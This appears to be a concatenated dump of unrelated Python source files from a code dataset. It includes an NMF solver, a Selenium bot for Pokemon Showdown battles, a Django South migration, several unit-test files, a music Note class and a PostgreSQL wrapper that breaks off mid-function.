pagerank = nx.pagerank(G, weight='weight')
mean_pagerank = np.mean(list(pagerank.values()))
criteria = literal_eval(df.iloc[index]['criteria_scores'])
df_save.loc[index] = [df.iloc[index]['final_score'], criteria['Competência 1'], criteria['Competência 2'], criteria['Competência 3'], criteria['Competência 4'], criteria['Competência 5'], nodes_count, edges_count, mean_out_degrees, mean_clustering_coefficient, average_shortest_path, average_shortest_path_inverse_weight, assortativity, density, mean_degree_centrality, mean_betweenness_centrality, mean_closeness_centrality, mean_pagerank]
bar.next()
df_save.to_csv(r'data/network_data.csv', header=True, index=False)
bar.finish()
| StarcoderdataPython |
1767921 | <reponame>douzepouze/python-mcumgr
from mcumgr import *
| StarcoderdataPython |
3392490 | <filename>msaf/pymf/nmfals.py
#!/usr/bin/python
#
# Copyright (C) <NAME>, 2010.
# Licensed under the GNU General Public License (GPL).
# http://www.gnu.org/licenses/gpl.txt
"""
PyMF Non-negative Matrix Factorization.
NMFALS: Class for Non-negative Matrix Factorization using alternating least
squares optimization (requires cvxopt)
[1] <NAME>. and <NAME>. (1999), Learning the Parts of Objects by Non-negative
Matrix Factorization, Nature 401(6755), 788-799.
"""
import numpy as np
from cvxopt import solvers, base
from nmf import NMF
__all__ = ["NMFALS"]
class NMFALS(NMF):
"""
NMF(data, num_bases=4)
Non-negative Matrix Factorization. Factorize a data matrix into two matrices
s.t. F = | data - W*H | = | is minimal. H, and W are restricted to non-negative
data. Uses the an alternating least squares procedure (quite slow for larger
data sets)
Parameters
----------
data : array_like, shape (_data_dimension, _num_samples)
the input data
num_bases: int, optional
Number of bases to compute (column rank of W and row rank of H).
4 (default)
Attributes
----------
W : "data_dimension x num_bases" matrix of basis vectors
H : "num bases x num_samples" matrix of coefficients
ferr : frobenius norm (after calling .factorize())
Example
-------
Applying NMF to some rather stupid data set:
>>> import numpy as np
>>> data = np.array([[1.0, 0.0, 2.0], [0.0, 1.0, 1.0]])
>>> nmf_mdl = NMFALS(data, num_bases=2)
>>> nmf_mdl.factorize(niter=10)
The basis vectors are now stored in nmf_mdl.W, the coefficients in nmf_mdl.H.
To compute coefficients for an existing set of basis vectors simply copy W
to nmf_mdl.W, and set compute_w to False:
>>> data = np.array([[1.5], [1.2]])
>>> W = np.array([[1.0, 0.0], [0.0, 1.0]])
>>> nmf_mdl = NMFALS(data, num_bases=2)
>>> nmf_mdl.W = W
>>> nmf_mdl.factorize(niter=1, compute_w=False)
The result is a set of coefficients nmf_mdl.H, s.t. data = W * nmf_mdl.H.
"""
def update_h(self):
def updatesingleH(i):
# optimize alpha using qp solver from cvxopt
FA = base.matrix(np.float64(np.dot(-self.W.T, self.data[:,i])))
al = solvers.qp(HA, FA, INQa, INQb)
self.H[:,i] = np.array(al['x']).reshape((1,-1))
# float64 required for cvxopt
HA = base.matrix(np.float64(np.dot(self.W.T, self.W)))
INQa = base.matrix(-np.eye(self._num_bases))
INQb = base.matrix(0.0, (self._num_bases,1))
map(updatesingleH, xrange(self._num_samples))
def update_w(self):
def updatesingleW(i):
# optimize alpha using qp solver from cvxopt
FA = base.matrix(np.float64(np.dot(-self.H, self.data[i,:].T)))
al = solvers.qp(HA, FA, INQa, INQb)
self.W[i,:] = np.array(al['x']).reshape((1,-1))
# float64 required for cvxopt
HA = base.matrix(np.float64(np.dot(self.H, self.H.T)))
INQa = base.matrix(-np.eye(self._num_bases))
INQb = base.matrix(0.0, (self._num_bases,1))
map(updatesingleW, xrange(self._data_dimension))
| StarcoderdataPython |
3247994 | <filename>tests/test_travis_project_exists.py<gh_stars>1-10
from setup_python_package.utils import travis_project_exists
def test_travis_project_exists():
assert travis_project_exists() | StarcoderdataPython |
1690449 | <reponame>Arastorn/Pokemon_RL
import time
import re
import random
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.keys import Keys
from app.src.showdownai.exceptions import *
class Selenium():
BASE_URL="http://play.pokemonshowdown.com"
def __init__(self, url=BASE_URL, timer_on=False, proxy=False, browser='chrome', lib_dir="app/lib/linux64/"):
self.url = url
self.timer_on = timer_on
self.browser = browser
self.lib_dir = lib_dir
chrome_path = self.lib_dir + "chromedriver"
self.driver = webdriver.Chrome(executable_path=chrome_path)
def start_driver(self):
print("Starting driver...")
self.driver.get(self.url)
def get_state(self):
url = self.driver.current_url
if "battle" in url:
return "battle"
else:
return "lobby"
def wait_home_page(self):
print("Waiting for home page to load...")
while self.driver.find_element_by_css_selector(".select.formatselect").get_attribute('value') != "gen7randombattle":
time.sleep(1)
def login(self, username, password):
self.wait_home_page()
print("Logging in...")
self.click_on_element_name("login")
self.write_in_element_name("username",username)
while not self.check_exists_by_name("password"):
time.sleep(1)
self.write_in_element_name("password",password)
def choose_tier(self, tier='gen7ou'):
try:
print("Selecting tier...")
while not self.check_exists_by_css_selector(".select.formatselect"):
time.sleep(1)
self.click_on_element_css(".select.formatselect")
self.click_on_element_css("[name='selectFormat'][value='%s']" % tier)
except:
raise TierException()
def start_ladder_battle(self):
print("Starting ladder battle!")
url = self.driver.current_url
self.click_on_element_css(".button.big")
battle_click = True
if url == self.driver.current_url and self.check_exists_by_name("username"):
ps_overlay = self.driver.find_element_by_xpath("/html/body/div[4]")
ps_overlay.click()
battle_click = False
while url == self.driver.current_url and self.check_exists_by_name("login"):
time.sleep(1)
if url == self.driver.current_url and not battle_click:
self.click_on_element_css(".button.big")
while url == self.driver.current_url:
time.sleep(1.5)
def start_challenge_battle(self, name, tier='gen7ou'):
print("Starting challenge battle!")
self.click_on_element_css(".button.mainmenu5.onlineonly")
if self.check_exists_by_css_selector(".textbox.autofocus"):
self.write_in_element_css(".textbox.autofocus",name)
else:
print("%s is not online...exiting now" % name)
raise UserNotOnlineException()
time.sleep(3)
#ps_overlay = self.driver.find_element_by_xpath("/html/body/div[4]")
#challenge = ps_overlay.find_element_by_css_selector("[name='pm']")
#challenge.click()
#time.sleep(2)
print("Waiting for user to click on challenge !")
while not self.check_exists_by_css_selector(".challenge"):
time.sleep(1)
challengeWindow = self.driver.find_element_by_css_selector(".challenge")
formatCombat = challengeWindow.find_element_by_css_selector(".select.formatselect")
formatCombat.click()
time.sleep(2)
self.click_on_element_css("[name='selectFormat'][value='gen7ou']")
make_challenge = challengeWindow.find_element_by_css_selector("[name='makeChallenge']")
make_challenge.click()
print("Sent a challenge!")
def get_battle_id(self):
url = self.driver.current_url
url_list = url.split('-')
id = url_list[-2:]
return '-'.join(id)
def make_team(self, team):
print("Making team...")
self.click_on_element_css(".button[value='teambuilder']")
self.click_on_element_css("[name='newTop']")
self.click_on_element_css(".button.big[name='import']")
textfield = self.driver.find_element_by_css_selector(".teamedit .textbox")
textfield.send_keys(team)
self.click_on_element_css(".savebutton[name='saveImport']")
# On click sur le format OU
while not self.check_exists_by_css_selector(".teambuilderformatselect"):
time.sleep(1)
self.click_on_element_css(".teambuilderformatselect")
self.click_on_element_css("[name='selectFormat'][value='gen7ou']")
self.click_on_element_css(".button[name='validate']")
while not self.check_exists_by_css_selector(".autofocus"):
time.sleep(1)
self.click_on_element_css(".autofocus")
self.click_on_element_css(".closebutton[name='closeRoom']")
def waiting_opponent_action(self):
print("Waiting opponent action...")
move_exists = self.check_exists_by_css_selector(".movemenu") or self.check_exists_by_css_selector(".switchmenu")
while move_exists == False:
try:
time.sleep(2)
#self.start_timer()
except:
pass
time.sleep(2)
move_exists = self.check_exists_by_css_selector(".movemenu") or self.check_exists_by_css_selector(".switchmenu")
if self.check_exists_by_css_selector("[name='saveReplay']"):
self.chat("gg")
self.click_on_element_css("[name='saveReplay']")
while not self.check_exists_by_id(self.get_battle_id()):
time.sleep(1)
self.click_on_element_css(".ps-overlay")
raise GameOverException()
def start_timer(self):
if self.check_exists_by_name("openTimer"):
timer = self.driver.find_element_by_name("openTimer")
if timer.text == "Timer":
timer.click()
if self.check_exists_by_name("timerOn"):
print("Starting timer...")
self.click_on_element_name("timerOn")
self.timer_on = True
def random_Attack(self):
print("Making a move...")
if (self.check_alive()) and (self.check_exists_by_css_selector(".movemenu")):
if self.check_exists_by_name('megaevo'):
self.click_on_element_name("megaevo")
attacks = self.driver.find_elements_by_css_selector(".movemenu button")
if(len(attacks)>0):
randomAttack = random.randint(1,len(attacks)-1)
self.attack_Information(attacks[randomAttack])
attacks[randomAttack].click()
else:
self.switch_pokemon_random()
self.waiting_opponent_action()
def attack_Information(self, attack):
attack_name = attack.get_attribute("data-move")
type = attack.find_element_by_css_selector(".type").text
pp = attack.find_element_by_css_selector(".pp").text
print("Attack used : ", attack_name)
print("Type of the attack : ", type)
print("pp left on the attack : ", pp)
def choose_pokemon_at_game_start(self, index):
print("Choosing first Pokemon...")
choose = self.driver.find_elements_by_name("chooseTeamPreview")[index]
choose.click()
self.waiting_opponent_action()
def switch_pokemon_random(self):
print("Switching Pokemon Randomly...")
switchMenu = self.driver.find_element_by_css_selector(".switchmenu")
pokemonsAvailable = switchMenu.find_elements_by_css_selector("[name='chooseSwitch']")
# Take a random number of PokemonsAvailable
if(len(pokemonsAvailable) > 0 ):
randomPokemon = random.randint(1,len(pokemonsAvailable)-1)
pokemonsAvailable[randomPokemon].click()
def get_my_primary(self):
if self.check_exists_by_css_selector(".rstatbar strong"):
text = self.driver.find_element_by_css_selector(".rstatbar strong").text
poke = text
return poke
def get_opponent_primary(self):
if self.check_exists_by_css_selector(".lstatbar strong"):
text = self.driver.find_element_by_css_selector(".lstatbar strong").text
poke = text
return poke
def get_my_primary_health(self):
if self.check_exists_by_css_selector(".rstatbar .hpbar .hptext"):
hp_text = self.driver.find_element_by_css_selector(".rstatbar .hpbar .hptext")
hp = hp_text.text.strip("%")
hp = int(hp)
else:
hp = 0
return hp
def get_opponent_primary_health(self):
if self.check_exists_by_css_selector(".lstatbar .hpbar .hptext"):
hp_text = self.driver.find_element_by_css_selector(".lstatbar .hpbar .hptext")
hp = hp_text.text.strip("%")
hp = int(hp)
else:
hp = 0
return hp
def get_my_team(self):
if self.check_exists_by_css_selector(".leftbar .trainer .teamicons"):
my_team_element = self.driver.find_elements_by_css_selector(".leftbar .trainer .teamicons span")
my_team = []
for element in my_team_element:
pokemon_name = element.get_attribute("title")
my_team.append(pokemon_name)
return my_team
def get_opponent_team(self):
if self.check_exists_by_css_selector(".rightbar .trainer .teamicons"):
my_team_element = self.driver.find_elements_by_css_selector(".rightbar .trainer .teamicons span")
my_team = []
for element in my_team_element:
pokemon_name = element.get_attribute("title")
my_team.append(pokemon_name)
return my_team
def check_alive(self):
return self.check_exists_by_css_selector(".rstatbar")
def chat(self, message):
chatbox = self.driver.find_elements_by_css_selector(".chatbox .textbox")[-1]
chatbox.send_keys(message)
chatbox.send_keys(Keys.RETURN)
def click_on_element_name(self,element):
try:
self.driver.find_element_by_name(element).click()
time.sleep(1)
except NoSuchElementException:
print("Element : " + element + " Not Found")
def click_on_element_css(self,element):
try:
self.driver.find_element_by_css_selector(element).click()
time.sleep(1)
except NoSuchElementException:
print("Element : " + element + " Not Found")
def write_in_element_name(self,element,stringToWrite):
try:
elem = self.driver.find_element_by_name(element)
elem.send_keys(stringToWrite)
elem.send_keys(Keys.RETURN)
time.sleep(1)
except NoSuchElementException:
print("Element : " + element + " Not Found")
def write_in_element_css(self,element,stringToWrite):
try:
elem = self.driver.find_element_by_css_selector(element)
elem.send_keys(stringToWrite)
elem.send_keys(Keys.RETURN)
time.sleep(1)
except NoSuchElementException:
print("Element : " + element + " Not Found")
def check_exists_by_xpath(self, xpath):
try:
self.driver.find_element_by_xpath(xpath)
except NoSuchElementException:
return False
return True
def check_exists_by_id(self, id):
try:
self.driver.find_element_by_id(id)
except NoSuchElementException:
return False
return True
def check_exists_by_name(self, name):
try:
self.driver.find_element_by_name(name)
except NoSuchElementException:
return False
return True
def check_exists_by_class(self, cls):
try:
self.driver.find_elements_by_class_name(cls)
except NoSuchElementException:
return False
return True
def check_exists_by_css_selector(self, css, elem=None):
try:
if elem:
result = elem.find_elements_by_css_selector(css)
else:
result = self.driver.find_elements_by_css_selector(css)
return len(result) > 0
except NoSuchElementException:
return False
def get_log(self):
log = self.driver.find_element_by_css_selector(".battle-log")
return log.text.encode('utf-8')
def reset(self):
self.driver.get(self.url)
time.sleep(2)
def close(self):
self.driver.close()
def clear_cookies(self):
self.driver.execute_script("localStorage.clear();")
def turn_off_sound(self):
print("Turning off sound...")
self.click_on_element_css(".icon[name='openSounds']")
self.click_on_element_css("[name='muted']")
| StarcoderdataPython |
24729 | <filename>oembed/migrations/0001_initial.py
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.conf import settings
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'StoredOEmbed'
db.create_table('oembed_storedoembed', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('match', self.gf('django.db.models.fields.TextField')()),
('response_json', self.gf('django.db.models.fields.TextField')()),
('resource_type', self.gf('django.db.models.fields.CharField')(max_length=8)),
('date_added', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('date_expires', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('maxwidth', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('maxheight', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('object_id', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('content_type', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='related_storedoembed', null=True, to=orm['contenttypes.ContentType'])),
))
db.send_create_signal('oembed', ['StoredOEmbed'])
# Adding unique constraint on 'StoredOEmbed', fields ['match', 'maxwidth', 'maxheight']
if 'mysql' not in settings.DATABASES['default']['ENGINE']:
db.create_unique('oembed_storedoembed', ['match', 'maxwidth', 'maxheight'])
# Adding model 'StoredProvider'
db.create_table('oembed_storedprovider', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('endpoint_url', self.gf('django.db.models.fields.CharField')(max_length=255)),
('regex', self.gf('django.db.models.fields.CharField')(max_length=255)),
('wildcard_regex', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('resource_type', self.gf('django.db.models.fields.CharField')(max_length=8)),
('active', self.gf('django.db.models.fields.BooleanField')(default=False, blank=True)),
('provides', self.gf('django.db.models.fields.BooleanField')(default=False, blank=True)),
('scheme_url', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
))
db.send_create_signal('oembed', ['StoredProvider'])
# Adding model 'AggregateMedia'
db.create_table('oembed_aggregatemedia', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('url', self.gf('django.db.models.fields.TextField')()),
('object_id', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('content_type', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='aggregate_media', null=True, to=orm['contenttypes.ContentType'])),
))
db.send_create_signal('oembed', ['AggregateMedia'])
def backwards(self, orm):
# Deleting model 'StoredOEmbed'
db.delete_table('oembed_storedoembed')
# Removing unique constraint on 'StoredOEmbed', fields ['match', 'maxwidth', 'maxheight']
if 'mysql' not in settings.DATABASES['default']['ENGINE']:
db.delete_unique('oembed_storedoembed', ['match', 'maxwidth', 'maxheight'])
# Deleting model 'StoredProvider'
db.delete_table('oembed_storedprovider')
# Deleting model 'AggregateMedia'
db.delete_table('oembed_aggregatemedia')
models = {
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'oembed.aggregatemedia': {
'Meta': {'object_name': 'AggregateMedia'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'aggregate_media'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.TextField', [], {})
},
'oembed.storedoembed': {
'Meta': {'ordering': "('-date_added',)", 'unique_together': "(('match', 'maxwidth', 'maxheight'),)", 'object_name': 'StoredOEmbed'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'related_storedoembed'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_expires': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'match': ('django.db.models.fields.TextField', [], {}),
'maxheight': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'maxwidth': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'resource_type': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'response_json': ('django.db.models.fields.TextField', [], {})
},
'oembed.storedprovider': {
'Meta': {'ordering': "('endpoint_url', 'resource_type', 'wildcard_regex')", 'object_name': 'StoredProvider'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'endpoint_url': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'provides': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'regex': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'resource_type': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'scheme_url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'wildcard_regex': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'})
}
}
complete_apps = ['oembed']
| StarcoderdataPython |
3372020 | from pathlib import Path
import randomname
def test_get_name():
name = randomname.get_name('music_theory', 'cats').split('-', 1)
assert len(name) > 1
assert name[0] in randomname.util.get_groups_list('a/music_theory')
assert name[1] in randomname.util.get_groups_list('n/cats')
assert 'asdf' in randomname.util.get_groups_list(['n/cats', 'asdf'])
def test_generate():
name = randomname.generate('n/cats', 'a/music_theory', 'n/food').split('-', 2)
assert len(name) > 2
assert name[0] in randomname.util.get_groups_list('n/cats')
assert name[1] in randomname.util.get_groups_list('a/music_theory')
assert name[2] in randomname.util.get_groups_list('n/food')
assert name[0] not in randomname.util.get_groups_list('n/food')
def test_generated_names_are_valid_file_names(tmp_path: Path):
random_names = [randomname.generate() for _ in range(10)]
for name in random_names:
# does not raise
(Path(tmp_path) / name).touch()
| StarcoderdataPython |
3272326 | <gh_stars>1-10
# -*- coding: utf-8 -*-
import unittest
import unittest.mock as mock
from fastapi.testclient import TestClient
from projects.api.main import app
from projects.database import session_scope
import tests.util as util
app.dependency_overrides[session_scope] = util.override_session_scope
TEST_CLIENT = TestClient(app)
class TestMetrics(unittest.TestCase):
maxDiff = None
def setUp(self):
"""
Sets up the test before running it.
"""
util.create_mocks()
def tearDown(self):
"""
Deconstructs the test after running it.
"""
util.delete_mocks()
def test_list_metrics_project_not_found(self):
"""
Should return an http status 404 and an error message.
"""
project_id = "unk"
experiment_id = "unk"
run_id = "unk"
operator_id = "unk"
rv = TEST_CLIENT.get(
f"/projects/{project_id}/experiments/{experiment_id}/runs/{run_id}/operators/{operator_id}/metrics"
)
result = rv.json()
expected = {
"message": "The specified project does not exist",
"code": "ProjectNotFound",
}
self.assertDictEqual(expected, result)
self.assertEqual(rv.status_code, 404)
def test_list_metrics_experiment_not_found(self):
"""
Should return an http status 404 and an error message.
"""
project_id = util.MOCK_UUID_1
experiment_id = "unk"
run_id = "unk"
operator_id = "unk"
rv = TEST_CLIENT.get(
f"/projects/{project_id}/experiments/{experiment_id}/runs/{run_id}/operators/{operator_id}/metrics"
)
result = rv.json()
expected = {
"message": "The specified experiment does not exist",
"code": "ExperimentNotFound",
}
self.assertDictEqual(expected, result)
self.assertEqual(rv.status_code, 404)
@mock.patch(
"kfp.Client",
return_value=util.MOCK_KFP_CLIENT,
)
@mock.patch(
"platiagro.list_metrics",
side_effect=FileNotFoundError(),
)
def test_list_metrics_success_1(
self,
mock_list_metrics,
mock_kfp_client,
):
"""
Should return a list of metrics successfully.
"""
project_id = util.MOCK_UUID_1
experiment_id = util.MOCK_UUID_1
run_id = "latest"
operator_id = util.MOCK_UUID_1
rv = TEST_CLIENT.get(
f"/projects/{project_id}/experiments/{experiment_id}/runs/{run_id}/operators/{operator_id}/metrics"
)
result = rv.json()
self.assertIsInstance(result, list)
self.assertEqual(result, [])
mock_kfp_client.assert_any_call(host="http://ml-pipeline.kubeflow:8888")
mock_list_metrics.assert_any_call(
experiment_id=experiment_id, operator_id=operator_id, run_id=run_id
)
@mock.patch(
"kfp.Client",
return_value=util.MOCK_KFP_CLIENT,
)
@mock.patch(
"platiagro.list_metrics",
return_value=[{"accuracy": 1.0}],
)
def test_list_metrics_success_2(
self,
mock_list_metrics,
mock_kfp_client,
):
"""
Should return a list of metrics successfully.
"""
project_id = util.MOCK_UUID_1
experiment_id = util.MOCK_UUID_1
run_id = "latest"
operator_id = util.MOCK_UUID_1
rv = TEST_CLIENT.get(
f"/projects/{project_id}/experiments/{experiment_id}/runs/{run_id}/operators/{operator_id}/metrics"
)
result = rv.json()
self.assertIsInstance(result, list)
self.assertEqual(result, [{"accuracy": 1.0}])
mock_kfp_client.assert_any_call(host="http://ml-pipeline.kubeflow:8888")
mock_list_metrics.assert_any_call(
experiment_id=experiment_id, operator_id=operator_id, run_id=run_id
)
| StarcoderdataPython |
3285000 | <gh_stars>100-1000
import json
import subprocess
import pytest
from all_repos.push import github_pull_request
from testing.auto_namedtuple import auto_namedtuple
from testing.git import init_repo
@pytest.fixture
def fake_github_repo(tmpdir):
# hax: make the repo end with :repo/slug so it "looks" like a github repo
src = tmpdir.join('repo:user/slug')
init_repo(src)
dest = tmpdir.join('dest')
subprocess.check_call(('git', 'clone', src, dest))
subprocess.check_call((
'git', '-C', dest, 'checkout', 'origin/master', '-b', 'feature',
))
subprocess.check_call((
'git', '-C', dest, 'commit', '--allow-empty',
'-m', 'This is a commit message\n\nHere is some more information!',
))
settings = github_pull_request.Settings(api_key='fake', username='user')
return auto_namedtuple(src=src, dest=dest, settings=settings)
def test_github_pull_request(mock_urlopen, fake_github_repo):
resp = {'html_url': 'https://example/com'}
mock_urlopen.return_value.read.return_value = json.dumps(resp).encode()
with fake_github_repo.dest.as_cwd():
github_pull_request.push(fake_github_repo.settings, 'feature')
# Should have pushed the branch to origin
out = subprocess.check_output((
'git', '-C', fake_github_repo.src, 'branch',
)).decode()
assert out == ' feature\n* master\n'
# Pull request should have been made with the commit data
(req,), _ = mock_urlopen.call_args
assert req.get_full_url() == 'https://api.github.com/repos/user/slug/pulls'
assert req.method == 'POST'
data = json.loads(req.data)
assert data['title'] == 'This is a commit message'
assert data['body'] == 'Here is some more information!'
assert data['head'] == 'feature'
@pytest.fixture
def fake_github_repo_fork(tmpdir, fake_github_repo):
fork = tmpdir.join('repo:u2/slug')
subprocess.check_call(('git', 'clone', fake_github_repo.src, fork))
settings = fake_github_repo.settings._replace(fork=True, username='u2')
dct = dict(fake_github_repo._asdict(), settings=settings, fork=fork)
return auto_namedtuple(**dct)
def test_github_pull_request_with_fork(mock_urlopen, fake_github_repo_fork):
# this is a mishmash of both of the requests (satisfies both)
resp = {'full_name': 'u2/slug', 'html_url': 'https://example/com'}
mock_urlopen.return_value.read.return_value = json.dumps(resp).encode()
with fake_github_repo_fork.dest.as_cwd():
github_pull_request.push(fake_github_repo_fork.settings, 'feature')
# Should have pushed the branch to the fork
out = subprocess.check_output((
'git', '-C', fake_github_repo_fork.src, 'branch',
)).decode()
assert out == '* master\n'
out = subprocess.check_output((
'git', '-C', fake_github_repo_fork.fork, 'branch',
)).decode()
assert out == ' feature\n* master\n'
(req,), _ = mock_urlopen.call_args
assert req.get_full_url() == 'https://api.github.com/repos/user/slug/pulls'
data = json.loads(req.data)
assert data['head'] == 'u2:feature'
def test_settings_repr():
assert repr(github_pull_request.Settings('secret', 'username')) == (
'Settings(\n'
' api_key=...,\n'
" username='username',\n"
' fork=False,\n'
" base_url='https://api.github.com',\n"
')'
)
| StarcoderdataPython |
1619360 | import numpy as np
from info import freq_to_notes
class Note:
def __init__(self, pitch, signal, loudness, timestamp, duration=None, typ=None):
self.pitch = round(pitch, 3)
self.signal = round(signal, 3)
self.loudness = round(loudness, 3)
self.timestamp = timestamp
self.given_pitch = self.closest_pitch(pitch)
self.duration = duration
self.typ = typ
note_info = freq_to_notes[self.given_pitch]
self.id = note_info["id"]
self.note = note_info["note"]
self.octave = note_info["octave"]
self.alter = note_info["alter"]
def closest_pitch(self, pitch):
"""
Given a pitch finds the closest musical note. This is determined by the absolute distance in frequency (Hertz).
"""
pitches = np.array(list(freq_to_notes.keys()))
idx = (np.abs(pitches - pitch)).argmin()
return pitches[idx]
def getInfo(self):
"""
Returns all the information stored in a musical note.
"""
return (self.timestamp, self.id, self.signal, self.pitch, self.given_pitch,
self.loudness, self.note, self.octave, self.alter)
def describe(self):
"""
Prints all the information describing a note.
"""
note = str(self.note)
note += ("#" if self.alter else "")
print(f"\n{note}, octave: {self.octave}, actual pitch: {self.pitch}Hz, ideal pitch: {self.given_pitch}Hz")
print(f"timestamp: {self.timestamp}")
| StarcoderdataPython |
1637105 | from HTMLParser import HTMLParser
class CourseHTMLParser(HTMLParser):
def __init__(self):
self.status_classes = ["open-status-open", "open-status-closed", "open-status-warning", "open-status-archived"]
self.section_names = []
self.section_statuses = []
self.valid = True
HTMLParser.__init__(self)
def handle_starttag(self, tag, attrs):
if (tag == "ul"):
for pair in attrs:
if (len(pair) >= 2 and pair[0] == 'aria-label' and "Class Section" in pair[1]):
self.section_names.append(pair[1].replace("Class Section ", ""))
if (tag == "i"):
for pair in attrs:
if (len(pair) >= 2):
attrlist = pair[1].split(" ")
matches = list(filter(lambda x: x in self.status_classes, attrlist))
if (len(matches) == 1):
status = matches[0].replace("open-status-", "")
status = status.replace("warning", "waitlisted")
self.section_statuses.append(status)
def handle_data(self, data):
if "Class Not Found." in data:
self.valid = False
print("Invalid URL!")
def get_section_names(self):
return self.section_names
def get_section_statuses(self):
return self.section_statuses | StarcoderdataPython |
1642639 | <reponame>alinenog/Mundo_Python-1-2-3<gh_stars>0
#Exercício Python 37:
# Escreva um programa em Python que leia um número inteiro qualquer e peça para o usuário
# escolher qual será a base de conversão: 1 para binário, 2 para octal e 3 para hexadecimal.
num = int(input("Digite um número inteiro: "))
print('''Escolha a base para conversão
[1] Converter para BINARIO
[2] Converter para OCTAL
[3] Converter para HEXADECIMAL
''')
opcao = int(input("Escolha uma opcao para conversão!"))
if opcao == 1:
print('{} convertido para Binário é igual a {}.'.format(num, bin(num)[2:]))
elif opcao == 2:
print("{} convertido para Octal é {}".format(num, oct(num)[:2]))
elif opcao == 3:
print("{} convertido para Hexadecimal é {}".format(num, hex(num)[2:])) # [2:] fatiamento de string
else:
print("Escolha a opção 1, 2 ou 3") | StarcoderdataPython |
104847 | # Add 5 to number
add5 = lambda n : n + 5
print(add5(2))
print(add5(7))
print()
# Square number
sqr = lambda n : n * n
print(sqr(2))
print(sqr(7))
print()
# Next integer
nextInt = lambda n : int(n) + 1
print(nextInt(2.7))
print(nextInt(7.2))
print()
# Previous integer of half
prevInt = lambda n : int(n // 2)
print(prevInt(2.7))
print(prevInt(7.2))
print()
# Division lambda
div = lambda dvsr : lambda dvdn : dvdn / dvsr
print(div(5)(10))
print(div(3)(27)) | StarcoderdataPython |
1614414 | <filename>code/backend/twitter/wrappers/postgresql_wrapper.py
## @package twitter.wrappers
# coding: UTF-8
import psycopg2
import logging
import credentials as credentials
from api.enums import Policy as enum_policy
import django.dispatch
log = logging.getLogger("PostgreSQL")
log.setLevel(logging.DEBUG)
handler = logging.StreamHandler(open("postgres.log", "w"))
handler.setFormatter(
logging.Formatter("[%(asctime)s]:[%(levelname)s]:%(module)s - %(message)s")
)
log.addHandler(handler)
signal = django.dispatch.Signal(providing_args=["table_name"])
class PostgresAPI:
"""PostgreSQL
Encompasses methods used for all API and PDP interactions with our PostgreSQL DB.
"""
def __init__(self):
log.debug(f"Connecting to PostgreSQL Analysis with credentials: \n"
f"url={credentials.POSTGRES_URL}\n"
f"db={credentials.POSTGRES_DB}\n"
f"user={credentials.POSTGRES_USERNAME}\n"
f"port={credentials.POSTGRES_PORT}")
try:
# Connect to the PostgreSQL server
self.conn = psycopg2.connect(
host=credentials.POSTGRES_URL, database=credentials.POSTGRES_DB,
user=credentials.POSTGRES_USERNAME, password=credentials.POSTGRES_PASSWORD,
port=credentials.POSTGRES_PORT
)
self.api_types = [x[0] for x in enum_policy.api_types()]
self.filters = [x[0] for x in enum_policy.api_filter()]
self.list_of_users = []
self.list_of_tweets = []
except (Exception, psycopg2.DatabaseError) as error:
log.exception(f"Error <{error}> trying to connect to database: ")
def insert_tweet(self, data):
self.list_of_tweets.append(data)
def __save_tweet(self, data):
"""
Attempts to insert a new Tweet item into the database
@param data: The data of the item we want to insert. Should have - tweet_id, user_id, likes, retweets
@return A success or failure message ({success: True/False ; error: None/Error})
"""
try:
cursor = self.conn.cursor()
cursor.execute(
"INSERT INTO tweets (timestamp, tweet_id, user_id, likes, retweets) values (DEFAULT,%s,%s,%s,%s);",
(int(data["tweet_id"]), int(data["user_id"]), data["likes"], data["retweets"]))
self.conn.commit()
signal.send(sender=PostgresAPI, table_name="TweetStats")
